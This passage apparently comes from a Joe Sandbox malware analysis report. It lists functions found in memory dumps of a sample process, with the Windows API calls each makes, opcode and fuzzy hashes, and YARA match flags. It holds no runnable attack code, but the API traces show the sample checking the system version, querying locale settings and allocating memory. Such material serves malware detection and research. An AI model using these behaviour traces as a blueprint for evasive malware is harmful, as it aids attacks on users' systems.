                                                                                                                                                                                                                                                            • Opcode ID: 0ef20ef31486968fd6e1db149edee5e259f642605a3ca6a776f865cc95688f01
                                                                                                                                                                                                                                                            • Instruction ID: 25af06fea796399912edc243180874a057d114055f7c3fe5d20b4c842e493a22
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ef20ef31486968fd6e1db149edee5e259f642605a3ca6a776f865cc95688f01
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67B10672204789DFDB21CF64CDC4AA977E8FF45711F88012AEE498B251D370AB41CB5A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000001,?,?,?,033A1725), ref: 033A144B
                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,033A1725), ref: 033A1472
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2087232378-0
                                                                                                                                                                                                                                                            • Opcode ID: 62156ca02f3c0169a004336cf52591e62b455b3fc886def557b07bffd1e834c5
                                                                                                                                                                                                                                                            • Instruction ID: d25f68835b0ff31246b49a0d8fe0cab05ab7dd4d2b43eb7430b3224b71cef565
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62156ca02f3c0169a004336cf52591e62b455b3fc886def557b07bffd1e834c5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF0E27BF01F2016DB20DA6D4DC0B5266A8DF86BA0F090170FA48EF2C8D661884146A0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,0040AF4B,?,?,?,00000000), ref: 0040AEEC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DefaultLanguageSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4166810957-0
                                                                                                                                                                                                                                                            • Opcode ID: 66a4d2a00d45827909e64d4115acc47836f2faef788d0f19d7f6b1eb0cd9adfa
                                                                                                                                                                                                                                                            • Instruction ID: d8529c3a86b5486bf577bb49881e36b276531488797953cddac343c358fd6839
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66a4d2a00d45827909e64d4115acc47836f2faef788d0f19d7f6b1eb0cd9adfa
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62417471A443199BD720EB65DC8978AB3F5AF58304F5005F6E008B32D2DB78AE948E5A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(000003FF,?), ref: 033C2726
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PathTemp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                                                                                                                                            • Opcode ID: aad68c649e966f53204cb38b352bc49faed6fd0057dced626049c2d5f8e77dd1
                                                                                                                                                                                                                                                            • Instruction ID: 9fad9bacda6fb2633d2cdbfaaf2e995bf8bd20b96ab2ca3929595ea1b108156c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aad68c649e966f53204cb38b352bc49faed6fd0057dced626049c2d5f8e77dd1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C311B78E1065C9FDF20EB68C9C0ADDB7B9EF44304F5084E5E604AB211E770AF869B54
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AC56,?,04590FE0,00869044,?,00409D6C,04590FE0,?,0000020A,04590FE0,00869044,00409DAD), ref: 0040ABD8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModuleName
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                                                                                                                                            • Opcode ID: 6dfcb00e295d27a0b4735b36a0dbacd346025578fc11e0d51805ccceb5b76337
                                                                                                                                                                                                                                                            • Instruction ID: 771ce1d65e53cd220824622077c18220499e43e131d77fe26079b548053c9918
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dfcb00e295d27a0b4735b36a0dbacd346025578fc11e0d51805ccceb5b76337
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7611987194821C9BDB24EB60CD86BDE73B9DB14304F5144BAB508B32D1DA785F848A9A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(033E84D4,?,00000105), ref: 033A5EAF
                                                                                                                                                                                                                                                              • Part of subcall function 033A4CB8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 033A4CD4
                                                                                                                                                                                                                                                              • Part of subcall function 033A4CB8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 033A4CF2
                                                                                                                                                                                                                                                              • Part of subcall function 033A4CB8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F003F,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 033A4D10
                                                                                                                                                                                                                                                              • Part of subcall function 033A4CB8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000005,00000000,033A4D84,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?), ref: 033A4D4A
                                                                                                                                                                                                                                                              • Part of subcall function 033A4CB8: RegQueryValueExA.ADVAPI32(?,033A4EB0,00000000,00000000,00000000,00000005,?,00000000,00000000,00000000,00000000,00000005,00000000,033A4D84,?,80000001), ref: 033A4D68
                                                                                                                                                                                                                                                              • Part of subcall function 033A4CB8: RegCloseKey.ADVAPI32(?,033A4D8B,00000000,00000000,00000005,00000000,033A4D84,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 033A4D7E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModuleNameOpenQueryValue$Close
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1918644479-0
                                                                                                                                                                                                                                                            • Opcode ID: 602f25cfee4ebd195ddb6171c6b1b42d5a49bef7dbd2c0a92a62ad4b1039fdae
                                                                                                                                                                                                                                                            • Instruction ID: 178412546994919b6e507af0d4f4c260fecebe3db3e8cb2ae8f14b4d6094078a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 602f25cfee4ebd195ddb6171c6b1b42d5a49bef7dbd2c0a92a62ad4b1039fdae
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25E086B9E48B155FD750FF9CADC2946329CDB14325F5000256658CF3C8D7789D444B52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101), ref: 033D398C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Startup
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 724789610-0
                                                                                                                                                                                                                                                            • Opcode ID: 4555526682aca76525628d69141f3e432693d9fe654b5232b30e1566f7eca73d
                                                                                                                                                                                                                                                            • Instruction ID: 0ce5f06978771e708e66189d7ea6c57eefe4db8dd08df46be804bc82bd035cdc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4555526682aca76525628d69141f3e432693d9fe654b5232b30e1566f7eca73d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57B0922AA0224026E6022376AE43782384D9B41320F8801A069A8842DBEA9B9168819B
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 033A155C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                                                            • Opcode ID: a4e82beab3d9e809c3df966acd2f6b6bdeabdb952449b56dfd0dca489cee83f6
                                                                                                                                                                                                                                                            • Instruction ID: c3895906a2448cf5b276b305e202ff4146fe5e1f3a1ce850a750998c6dc80fd6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4e82beab3d9e809c3df966acd2f6b6bdeabdb952449b56dfd0dca489cee83f6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D121E375A08B10AFD714DF1DC8C0A5ABBE5EF85760F18C969E4998B354D330E880CF96
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,00000000,?,00000000,0040AD3D,?,?,?,00000000), ref: 0040AD0A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcpyn
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 97706510-0
                                                                                                                                                                                                                                                            • Opcode ID: 62f58fe671fac46956649dfa42b4a06e9d9c51d22aeb2ca6305eae8df1c9bc3b
                                                                                                                                                                                                                                                            • Instruction ID: 952477280eb2d073172a3deebbbadb697fdb28e29115ede6f0f0dc9af39f96bd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62f58fe671fac46956649dfa42b4a06e9d9c51d22aeb2ca6305eae8df1c9bc3b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B211E371908308AFEB20DB68C886AAA77E8EF15314F5104B6F844A72C0D7B85D50972B
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,03449DB8,0344DDBB,033A18AB), ref: 033A169E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                                                            • Opcode ID: d7e3eedc9ad134117283ec587b97fa73907f752a23e099adeae29cc0b9431bcf
                                                                                                                                                                                                                                                            • Instruction ID: f444e61ba1f719d0ae0cedf699b71dde252dd5b468c43bee080331813d8585ba
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e3eedc9ad134117283ec587b97fa73907f752a23e099adeae29cc0b9431bcf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F801DF7BE48A145FC710EF2CDDC0A2A77A8DB84324F19067CDE84DB351D2326C418BA4
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00403107), ref: 00402B0E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                            • Opcode ID: 7086043f854aeabdd748604502d9e9e754581baddf49906d5f90c171e79ab4a0
                                                                                                                                                                                                                                                            • Instruction ID: 7676bbfaa4a99f35c6751e8613a9746da9d777a8880297b7060b3b7c351f590d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7086043f854aeabdd748604502d9e9e754581baddf49906d5f90c171e79ab4a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAF03CB1B153008BDB149F799E49701BBE2BB89304F10813DE50DEB7D9E7B484458B04
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000014,00001000,00000040,?,?,033D9D8B,?,?,?), ref: 033CCE38
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                            • Opcode ID: 0f9e53bbb94b8b9d5383ceb72335569b62271c1bd601c7fc2bf966fe6f30c3e3
                                                                                                                                                                                                                                                            • Instruction ID: f06d9cca46d99d77977beedee57157a0713877db0a8a0ada5884134c9d0184b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f9e53bbb94b8b9d5383ceb72335569b62271c1bd601c7fc2bf966fe6f30c3e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0D002B13512206FE761D6999CC1F9267D8DB4D7A1F114161F718DF2D5D1A15C004B94
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,033DD095,?,?,?,?,033DD183), ref: 033CCE52
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                                                            • Opcode ID: e2760c7eaaff37ca02df56f5bc19540fe4a274fec586a6dd2abf3c8f05824318
                                                                                                                                                                                                                                                            • Instruction ID: 0280d0602f66d618da8ed0fff5cd3efd6e8e65416de78a1b7254f3d664fcc4d0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2760c7eaaff37ca02df56f5bc19540fe4a274fec586a6dd2abf3c8f05824318
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75C092703501009FD290DB48CC81F0133A8BB89B00F004090B510CF2E4CA60A8008F00
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 054643690d44f16257d0f92c600a734f69f504c36543306958435fb7cb898a8c
                                                                                                                                                                                                                                                            • Instruction ID: c84ec1e07b17519bcef4bb1f45cf2af0962f8ef8f9e85a2ee63dda141d6198fe
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 054643690d44f16257d0f92c600a734f69f504c36543306958435fb7cb898a8c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16F0E236204E065F9322EE5EAEC2862FBDDF789B7035A4079E914CB510D621E890C660
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 35078911c4d43f6c6c938e33ac83797ccef11b66c2c80da8e4f6ff6da55a832f
                                                                                                                                                                                                                                                            • Instruction ID: 2398b2ccc34459da832a4c4ea06a78f6e7cecd2fba070403d23046ac6dac0c15
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35078911c4d43f6c6c938e33ac83797ccef11b66c2c80da8e4f6ff6da55a832f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57F0E53DA18F081ED226F7BC14D012D7B9CE787B10B810010E010CEAC1DB288400862A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: c45e69e87e8c0d194b88b7eb729f52060ac0642bc4977fd573525d8fbca6fbc5
                                                                                                                                                                                                                                                            • Instruction ID: f77de14894ea9d21af4cb53d160b6edb2fefd0794531f5c8f745854dc4ce82ab
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c45e69e87e8c0d194b88b7eb729f52060ac0642bc4977fd573525d8fbca6fbc5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1A00285712711478644A5FD5CC654941CDA64C021365B475B15BC7252D9599CA52114
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 5f0e840f2effd5e6bad3f1369893474ccf1c42e6d4008314e053529385ec01a8
                                                                                                                                                                                                                                                            • Instruction ID: ef678c1ec54def82f6bfd6b9b17b0a44d74d27cc6450b90cc72a65f2a009d283
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f0e840f2effd5e6bad3f1369893474ccf1c42e6d4008314e053529385ec01a8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AB01234109801412E30D6384CDF46FD5C8F4101513CD0C508485C3480EB04C200E471
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?,?,0040AA03,00000000,0040AAC4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105), ref: 0040A764
                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?,?,0040AA03,00000000,0040AAC4,?,80000001,Software\CodeGear\Locales,00000000,000F0019), ref: 0040A7D3
                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?,?,0040AA03,00000000,0040AAC4,?,80000001), ref: 0040A81B
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?,?,0040AA03,00000000,0040AAC4), ref: 0040A82E
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?,?,0040AA03,00000000), ref: 0040A844
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?,?,0040AA03), ref: 0040A850
                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(0000005A,?,00000104), ref: 0040A88C
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,0000005A,?,00000104), ref: 0040A898
                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,0000005C,?,?,0000005A,?,00000104), ref: 0040A8BB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                                                                                                                                                                                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                                                                                                                                                                                            • API String ID: 426534248-3908791685
                                                                                                                                                                                                                                                            • Opcode ID: fff4d093d4f64c9b8f0b0be4baa1e7ed36f96c168a4cb11f79d949cb4668dc06
                                                                                                                                                                                                                                                            • Instruction ID: 08b204b8f9dcac002f665e27cc2fe3104c2839342c80bb952a0621304cfe6181
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fff4d093d4f64c9b8f0b0be4baa1e7ed36f96c168a4cb11f79d949cb4668dc06
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451A4B2D006189FCB10EAA4CD89BDE73BCAB04314F1489B6A144F72C1E778DE558B5A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(0000009C), ref: 033D0652
                                                                                                                                                                                                                                                              • Part of subcall function 033D0A84: GetVersionExA.KERNEL32(?,?,00000000,?,033D0615), ref: 033D0ADB
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(0000009C), ref: 033D0621
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Version
                                                                                                                                                                                                                                                            • String ID: LANMANNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WINNT
                                                                                                                                                                                                                                                            • API String ID: 1889659487-2290413088
                                                                                                                                                                                                                                                            • Opcode ID: 203ec6536661d16aefde863bc4aef841e474d8a99ed56dfe039abf8291652f3d
                                                                                                                                                                                                                                                            • Instruction ID: fdb4ff5d262ac531842b237e93f9f915d820acb9558f736c13868b05fb02fdbc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 203ec6536661d16aefde863bc4aef841e474d8a99ed56dfe039abf8291652f3d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E531B53BF452085DDF28D6B4BDC57EABBADDB86B04F4800A2F4418E695E63489818F15
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?,00000000,033AD3DD), ref: 033AD358
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                                            • String ID: \pagefile.sys$\win386.swp
                                                                                                                                                                                                                                                            • API String ID: 481472006-523492860
                                                                                                                                                                                                                                                            • Opcode ID: 0280046587b06cbdbe650052ce28e9c0b66fbd0a394a4524ef00378e3e8a4246
                                                                                                                                                                                                                                                            • Instruction ID: 5f3c7c2155e4665c3089c2df2e91e574a5d15c748c1bc824a9610ce48661bcda
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0280046587b06cbdbe650052ce28e9c0b66fbd0a394a4524ef00378e3e8a4246
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D410D39D04A1EAACB10EBA8D8D05EDF375FF09700F8085A1E81566954EB349E86CB54
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000002,00000000,0040A3FF,?,?,?,00000000), ref: 0040A344
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00000059,?,00000055,?,00000002,00000000,0040A3FF,?,?,?,00000000), ref: 0040A360
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A3FF,?,?,?,00000000), ref: 0040A371
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Locale$Info$Valid
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1826331170-0
                                                                                                                                                                                                                                                            • Opcode ID: 6491b48216555f70a1019a6133b4d0416006fefd981fb9c7db9ab8d98f753c1e
                                                                                                                                                                                                                                                            • Instruction ID: 1e92f35711aceb852ec481b770b894b8151f2946676c8c0ea368725d2e7ef4d1
